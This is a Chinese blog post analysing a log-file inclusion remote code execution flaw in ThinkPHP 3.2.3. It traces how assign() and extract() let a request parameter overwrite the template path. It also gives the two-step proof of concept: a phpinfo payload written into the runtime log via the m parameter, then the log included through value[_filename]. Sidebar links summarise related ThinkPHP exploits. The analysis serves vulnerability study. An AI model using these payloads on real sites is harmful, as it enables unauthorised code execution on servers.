thinkphp3.2.3日志包含分析

最新推荐文章于 2024-05-16 09:31:14 发布
最新推荐文章于 2024-05-16 09:31:14 发布
阅读量1.4k 收藏 2
点赞数
分类专栏: 杂记 文章标签: php thinkphp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/125343112
版权

thinkphp3.2.3日志包含分析

文章目录

入口点修改

入口点在\Application\Home\Controller\IndexController.class.php

image-20220528223754541

我们将这个初始的index代码进行修改,这里的第6行,如果不是这样的话,会有一点问题,这个之后会详细分析

我刚开始的调试过程中,第6行为 $this->assign('value',$value);,这个会导致一个问题,之后会分析

<?php
namespace Home\Controller;
use Think\Controller;
class IndexController extends Controller {
    public function index($value=''){
        $this->assign($value);
        $this->display();
    }
}

调用流程图

在这里插入图片描述

调试分析

assign

首先查看assign的过程

image-20220614223825071

在第122行,调用了assign函数

image-20220614223905117

ThinkPHP\Library\Think\View.class.php中定义的assign()

image-20220614223951932

到这里就会发现一个问题,这里会创建一个tVar[‘name’]=$value,而这个name的值就是value,就是之后一切数组嵌套的原因,这是因为我的最开始的\Application\Home\Controller\IndexController.class.php中写的有问题

image-20220614224401367

我们将assign的第一个参数删除,那么在assign()函数中,就会满足if条件,进行第38行

image-20220614224534074

然后执行display的时候,tVar中才是一个键值对,而不是value中又有一个键值对

image-20220614224624967

display

从最开始的display开始

image-20220614201034141

然后在ThinkPHP\Library\Think\View.class.php的第125行,进行赋值,将tVar传值给了$params

image-20220614201221624

ThinkPHP\Library\Think\Hook.class.php的listen函数中,第89行,将$params传入exec函数

image-20220614201434000

然后ThinkPHP\Library\Think\Hook.class.php的exec中,第119行,将params传入run函数

image-20220614201528362

ThinkPHP\Library\Behavior\ParseTemplateBehavior.class.php的run函数这里,data其实就是params,然后将data[‘var’]传入fetch函数

image-20220614201624035

ThinkPHP\Library\Think\Template.class.php中,第75行,将上面的传入的data[‘var’]赋值为this->tVar,然后77行,将this->tVar传入load函数

image-20220614201840121

ThinkPHP\Library\Think\Storage\Driver\File.class.php中第77行进行判断,然后再78行进行extract赋值,但是因为是嵌套数组,所以其实是整了个value数组,但是value没定义,如左边的变量

image-20220614202003642

所以其实这个display(),就是整一个params,然后一路传参,然后利用最后第78行的extract赋值,覆盖_filename,进行文件包含

我的问题在于刚开始的params是个嵌套数组,多嵌套了一层,这就是问题所在!!!

所以将最开始的 $this->assign('value',$value);删除第一个参数即可

poc分析

m参数指定文件夹,c参数指定控制器,a参数指定方法,value参数就是我们的可控参数

首先传参m

index.php?m=--><?=phpinfo();?>

在这里插入图片描述

然后在Application\Runtime\Logs\Common\22_06_14.log中有记录

image-20220614192111827

得到日志文件的路径,然后文件包含执行任意命令

index.php?m=Home&c=Index&a=index&value[_filename]=.\Application\Runtime\Logs\Common\22_06_14.log

关于日志文件生成

日志文件有两类,日志以天为单位进行记录

Application\Runtime\Logs\Common\22_06_14.log
Application\Runtime\Logs\Home\22_06_14.log

在这里插入图片描述

当调试模式开启

在这里插入图片描述
不报错的情况下,在Application\Runtime\Logs\Home\中生成日志
在这里插入图片描述
报错的情况下,在Application\Runtime\Logs\Common中生成日志

在这里插入图片描述

当调试模式关闭

在这里插入图片描述
不报错的情况下,不生成日志

报错的情况下,在Application\Runtime\Logs\Common中生成日志

在这里插入图片描述

关于payload

index.php?m=Home&c=Index&a=index&value[_filename]=.\Application\Runtime\Logs\Common\22_06_14.log

三个参数分别是模块,控制器,操作

这里m参数指定文件夹,c参数指定控制器,a参数指定方法,value参数就是我们的可控参数

thinkphp采用单一入口模式访问应用,对应用的所有请求都定向到应用的入口文件,系统会从URL参数中解析当前请求的模块、控制器和操作,下面是一个标准的URL访问格式:

第一种访问方式
http://localhost:/thinkphp/index.php/Home/Index/index  入口文件/模块/控制器/操作
第二种访问方式(传参数)
http://localhost:/thinkphp/index.php?m=Home&c=Index&a=index  传三个参数

参考链接

  1. thinkphp3.2.3 日志文件包含分析 - ProcessOn
  2. 【漏洞通报】ThinkPHP3.2.x RCE漏洞通报 - 云+社区 - 腾讯云 (tencent.com)
  3. ThinkPHP3.2.x RCE复现 | 0xCreed (jxustctf.top)
Sk1y
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ThinkPHP_3.2.zip_thinkPHP3.2_thinkphp3.2..3
09-14
本篇将详细介绍ThinkPHP3.2版本,该版本在2013年12月31日进行了更新,其环境要求为PHP5.3及以上版本,并且兼容SAE等云平台,为开发者提供了更广泛的应用场景。 一、框架概述 ThinkPHP3.2是一个基于MVC模式的开源PHP...
Thinkphp3.2.3及以下版本漏洞整理
hackzkaq的博客
07-01 1万+
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 中间件漏洞 一.RCE ThinkPHP3.2.3缓存函数设计缺陷可导致代码执行 概述 网站为了提高访问效率往往会将用户访问过的页面存入缓存来减少开销。 而Thinkphp 在使用缓存的时候是将数据序列化,然后存进一个 php 文件中,这使得命令执行等行为成为可能。 就是缓存函数设计不严格,导致攻击者可以插入恶意代码,直接getshell。 实验环境 redhat6+apache2+Mysql+php5+thinkphp3.2.3 漏洞.
【Web】Ctfshow Thinkphp3.2.3代码审计(1)
uuzeray的博客
11-26 329
ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且debug很多站都没关,其目录结构为 Application/Runtime/Logs/Home/年份_月份_日期.log。在fetch方法中执行了eval('?访问/Application/Runtime/Logs/Home/21_04_15.log。发现任意命令执行后门:/index.php?题目提示要爆破,而且不超过365次 (1年的天数)查看附件源码 (config.php)发现定义了一个可执行命令的路由规则。
thinkphp3.1漏洞_浅谈Thinkphp3.2.3反序列化漏洞_小白漏洞笔记
最新发布
程序员六七的博客
05-16 491
我正在参加「掘金·启航计划」前言,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。随着框架代码量的增加,一些潜在的威胁也逐渐暴露
thinkphp3.2.3 代码执行
weixin_46801402的博客
11-02 1052
thinkphp3.2.3 代码执行
Thinkphp3.2.3 SQL注入漏洞
Sentiment的博客
05-20 4470
下载:ThinkPHP3.2.3完整版 - ThinkPHP框架 配置 ThinkPHP/Conf/convention.php配置下数据库,我这里直接用的sqllabs的数据库 写个查询入口Application/Home/Controller/IndexController.class.php <?php namespace Home\Controller; use Think\Controller; class IndexController ex
thinkphp3.2.3
qq_42307546的博客
07-01 347
php
ThinkPHP3.2.x RCE漏洞通报1
08-03
3.寻找程序上传,上传件 1.功能代码中的assign法中第个变量为可控变量: 3.赋值结束后进display法中,display法开始解析并获取模板件内容,此
thinkphp3.2.x新增图片上传缩略图裁剪类
06-26
调用方式很简单 get_sc($cover_id,[$width=180,$height=auto,$cut]) @param $cover_id 图片ID___ @param $width 宽度___ @param $height 高___ @param $cut 是否切割 默认不切割___ 直接返回新图片的url ...
thinkPHP3.2使用RBAC实现权限管理的实现
10-16
主要介绍了thinkPHP3.2使用RBAC实现权限管理的实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
Thinkphp3.2开发的API后台管理系统.zip
02-25
4. 返回JSON数据:在处理完请求后,使用Thinkphp3.2的`json()`函数返回JSON数据,包括数据内容、状态码和错误信息。 五、测试与优化 1. 使用Postman等工具进行接口测试,确保各个接口功能正常,响应时间合理。 2....
【安全漏洞】ThinkPHP 3.2.3 漏洞复现
2201_75857869的博客
03-03 1899
函数时没有参数传入,而我们找到的是有参数的,PHP7下起的ThinkPHP在调用有参函数却没有传入参数的情况下会报错,所以我们要选用PHP5而不选用PHP7.里的内容被存入了缓存文件php文件中,连带着我们输入的可控的php代码也在其中,然后包含了该文件,所以造成了命令执行。处,除了exp外,还有一处bind,这里同样也是用点拼接字符串,但是不同的是这里还拼接了一个冒号。,所以进入第二个分支,将我们的输入转化为十进制,恶意语句就被过滤了,后面就是正常的SQL语句了。最开始的字符传入的是0,才能去除掉冒号。
【TP3.2】:日志记录和查看
weixin_34417200的博客
07-27 1083
1、TP3.2手册日志类链接:http://document.thinkphp.cn/manual_3_2.html#log 2、日志默认路径:/Application/Runtime/Logs 3、TP3.2默认只能查看:只记录EMERG ALERT CRIT ERR 级别的错误,那我现在想要和apache的日志一样,查看全部级别的日志和数据,怎么办呢?      answer: //在配置中...
ThinkPHP3.2.3_SQLi
Jeromeyoung
01-03 426
虽然是跟完了,但是如果能想一想这开发者为什么会这样写的话,会让我们对程序的代码逻辑更加亲切,也是一种提高审计能力的方法。我想:给where处理写一个解析数组的功能,肯定是为了迎合多个条件的where的情况,但是这里因为测试代码中只传入了一个条件所以没办法从这个漏洞跟一遍它的完整功能,但是看对exp进行的相关操作,开发者的原意应该是可以让“输入”去控制where条件中的判断逻辑符,比如‘>,
ThinkPHP 3.2.3 RCE漏洞
归零者的博客
11-25 1693
用蚁剑连接地址:index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/23_11_25.log,密码为:8。访问index.php?ThinkPHP3.2.x 代码中如果模板赋值方法assign的第一个参数可控,可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,导致任意文件包含,可执行任意代码。,burp 抓包,将路径改为。日志文件中包含执行代码。
Thinkphp代码审计(php方向)
m0_55772907的博客
05-28 1448
以下代码审计是在thinkphp3.2.3版本上进行的 1、日志文件信息泄露 漏洞产生原因: ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且debug很多网站都没有关。 ThinkPHP默认安装后,也会在Runtime目录下生成日志ThinkPHP3.2日志文件路径:Application\Runtime\Logs\Home\22_05_22.log ThinkPHP3.1日志文件路径:Runtime\Logs\Home\22_05_22.lo...
关于Thinkphp日志写入
热门推荐
zhao0829wang的专栏
07-31 2万+
一、配置文件TP通过配置文件对日志进行设置.要开启日志记录,必须在配置中开启LOG_RECORD参数,以及可以在项目配置文件中配置需要记录的日志级别'LOG_RECORD' => true, // 进行日志记录 'LOG_EXCEPTION_RECORD' => true, // 是否记录异常信息日志 'LOG_LEVEL' => 'EM
Thinkphp3.2.3 关闭Runtime\Logs日志
༺墨༒眉༻
10-09 4291
'LOG_RECORD' =&gt; false, // 默认不记录日志 'LOG_TYPE' =&gt; 'File', // 日志记录类型 默认为文件方式 'LOG_LEVEL' =&gt; 'EMERG,ALERT,CRIT,ERR',// 允许记录的日志级别 'LOG_EXCEPTION_RECORD' ...
tp3.2.3sql注入漏洞分析
qq_53856457的博客
05-18 1553
thinkphp3.2.3 sql注入漏洞分析 文章目录thinkphp3.2.3 sql注入漏洞分析thinkphp3.2.3 where注入环境配置数据库配置控制器payload:过程分析ThinkPHP3.2.3_bind注入1. 环境2. payload3. 过程分析thinkphp 3.2.3 exp注入1.环境2.payload:3. 过程分析**补充:**1.为什么I()方法能阻止sql注入?2.parseWhereItem方法设计缺陷3.漏洞代码中的where方法为什么要是数组的形式 先到t
thinkphp3.2.x rce
12-18
ThinkPHP是一个开源的PHP开发框架,它的版本3.2.x是一个老版本,存在远程命令执行(RCE)漏洞。这个漏洞允许攻击者通过构造恶意请求来执行任意的系统命令,从而获得对应用服务器的完全控制权限。 这个漏洞的原因是在ThinkPHP 3.2.x版本的核心代码中没有对用户的输入进行充分的过滤和校验。攻击者可以利用这个漏洞来执行各种恶意操作,比如上传恶意文件、修改数据库内容或者获取系统敏感信息等。 为了利用这个漏洞,攻击者需要构造一个特殊的请求,其中包含可执行的系统命令。然后将这个请求发送到受影响的应用程序的漏洞点上。当应用程序在处理这个请求时,会将其中的系统命令当作可执行代码来执行,最终导致攻击者获取对应用服务器的控制权限。 为了修复这个漏洞,用户可以升级到最新版本的ThinkPHP框架。在最新版本中,开发者已经修复了这个漏洞,并加强了对用户输入的过滤和校验。此外,用户还可以根据自己的需求对应用程序进行进一步的安全加固,比如限制上传文件的类型和大小,对用户输入进行严格的过滤和校验等。 总之,ThinkPHP 3.2.x版本存在远程命令执行漏洞,攻击者可以通过构造恶意请求来执行任意的系统命令。为了修复这个漏洞,用户可以升级到最新版本的ThinkPHP框架,并加强应用程序的安全加固措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值